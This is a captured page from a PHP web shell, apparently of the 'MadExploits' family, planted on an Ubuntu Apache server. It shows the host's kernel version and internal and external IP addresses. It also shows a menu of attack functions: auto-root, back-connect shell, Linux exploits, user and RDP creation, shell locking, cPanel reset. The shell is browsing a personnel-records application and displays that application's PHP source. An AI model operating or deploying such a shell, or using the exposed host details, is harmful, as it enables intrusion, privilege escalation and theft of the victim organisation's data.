Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.118.3.199
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
foreigntraining /
[ HOME SHELL ]
Name
Size
Permission
Action
foreigntraining.php
4.15
KB
-rw-r--r--
foreigntraining_editor.php
5.16
KB
-rw-r--r--
foreigntraining_list.php
6.61
KB
-rw-r--r--
view.php
3.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : foreigntraining.php
<?php session_start(); include("../common/config.php"); include("../common/functions.php"); if(empty($_SESSION["username"])) { Header("Location: ../login/login.php"); } $cmd = $_REQUEST["cmd"]; switch($cmd) { case "add": if(empty($_REQUEST["id"])) { //Data Insert $stmt = $conn->prepare("INSERT INTO foreigntraining (GovtId,coursetitle,instName,instLocation,country_id,startDate,endDate,exmresult,userinfo_id) VALUES (?,?,?,?,?,?,?,?,?)"); $stmt->bind_param("ssssisssi", $_SESSION["pimsid"], $_REQUEST["coursetitle"], $_REQUEST["instName"], $_REQUEST["instLocation"], $_REQUEST["country_id"], date("Y-m-d", strtotime(str_replace("/","-",englishnum($_REQUEST["startDate"])))), date("Y-m-d", strtotime(str_replace("/","-",englishnum($_REQUEST["endDate"])))), $_REQUEST["exmresult"], $_SESSION["user_id"] ); $stmt->execute(); $stmt->close(); } else { //Data Update $stmt = $conn->prepare("UPDATE foreigntraining SET coursetitle = ?, instName = ?, instLocation = ?, country_id = ?, startDate = ?, endDate = ?, exmresult = ? WHERE id = ?"); $stmt->bind_param("sssisssi", $_REQUEST["coursetitle"], $_REQUEST["instName"], $_REQUEST["instLocation"], $_REQUEST["country_id"], date("Y-m-d", strtotime(str_replace("/","-",englishnum($_REQUEST["startDate"])))), date("Y-m-d", strtotime(str_replace("/","-",englishnum($_REQUEST["endDate"])))), $_REQUEST["exmresult"], $_REQUEST["id"]); $stmt->execute(); $stmt->close(); } Header("Location: ../foreigntraining/foreigntraining.php?cmd=list"); break; case "edit": $Id = $_REQUEST["id"]; if( !empty($Id )) { // prepare and bind $stmt = $conn->prepare("SELECT * FROM foreigntraining WHERE id = ?"); $stmt->bind_param("i",$_REQUEST["id"]); $stmt->execute(); //Result $result = $stmt->get_result(); //Data Retriving while($row = $result->fetch_assoc()) { $Id = $row["id"]; $GovtId = $row["GovtId"]; $coursetitle = $row["coursetitle"]; $instName = $row["instName"]; $instLocation = $row["instLocation"]; $country_id = $row["country_id"]; $startDate = date("d/m/Y", strtotime(str_replace("-","/",$row["startDate"]))); $endDate = date("d/m/Y", strtotime(str_replace("-","/",$row["endDate"]))); $exmresult = $row["exmresult"]; } $stmt->close(); } include("../foreigntraining/foreigntraining_editor.php"); break; case "delete": $Id = $_REQUEST["id"]; if($Id) { //$db->delete($info); } include("../foreigntraining/foreigntraining_list.php"); break; case "list" : if(!empty($_REQUEST["page"])&&$_SESSION["search"]=="yes") { $_SESSION["search"]="yes"; } else { $_SESSION["search"]="no"; unset($_SESSION["search"]); unset($_SESSION["field_value"]); } include("../foreigntraining/foreigntraining_list.php"); break; case "search_foreigntraining": $_REQUEST["page"] = 1; $_SESSION["search"]="yes"; $_SESSION["field_value"] = $_REQUEST["field_value"]; include("../foreigntraining/foreigntraining_list.php"); break; default : include("../foreigntraining/foreigntraining_editor.php"); } ?>
Close